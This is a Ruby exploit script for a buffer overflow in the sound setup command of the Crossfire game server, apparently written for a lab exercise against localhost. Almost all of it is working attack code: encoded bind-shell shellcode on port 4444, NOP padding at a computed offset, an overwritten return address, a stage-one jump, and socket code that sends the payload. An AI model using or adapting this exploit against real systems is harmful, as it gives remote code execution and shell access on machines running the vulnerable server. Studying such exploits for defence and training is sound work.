#!/usr/bin/env ruby

=begin
This exploit takes advantage of a buffer overflow vulnerability during the
sound setup stage of the game Crossfire.
=end

require 'socket'

#total size = 4379
#offset = 4368
#bad chars = "\x00\x0a\x0d\x20"

#add eax, 12 = 83C00C
#jmp eax = FFE0


#create shellcode
#creates a bind shell on port 4444
shellcode = "\xba\xe9\x41\x08\x31\xdb\xd3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"+
"\x14\x31\x50\x14\x83\xc0\x04\x03\x50\x10\x0b\xb4\x39\xea\x3c"+
"\xd4\x69\x4f\x91\x71\x8c\xc6\xf4\x36\xf6\x15\x76\x6d\xa9\xf7"+
"\x1e\x90\x55\xe9\x82\xfe\x45\x58\x6a\x76\x84\x30\xec\xd0\x8a"+
"\x45\x79\xa1\x10\xf5\x7d\x92\x7f\x34\xfd\x91\xcf\xa0\x30\x95"+
"\xa3\x74\xa0\xa9\x9b\x4b\xb4\x9f\x62\xac\xdc\x30\xba\x3f\x74"+
"\x27\xeb\xdd\xed\xd9\x7a\xc2\xbd\x76\xf4\xe4\x8d\x72\xcb\x67"

#create buffer to cause the crash
buffer = "\x90" * (4368 - 105)


#create eip value
eip = "\x97\x45\x13\x08"

#create stage one
stage_one = "\x83\xC0\x0C\xFF\xE0"

#create padding
padding = "\x90" * (4379 - 4368 - 4 - 5)

#assemble payload
payload = "\x11(setup sound " + shellcode + buffer + eip + stage_one + padding + "\x90\x00\#"

#send payload
puts "sending payload..."
socket = Socket.tcp("127.0.0.1", 13327)
socket.write(payload)
puts socket.gets.chomp
socket.close
puts "payload sent... socket closed..."
exit(0)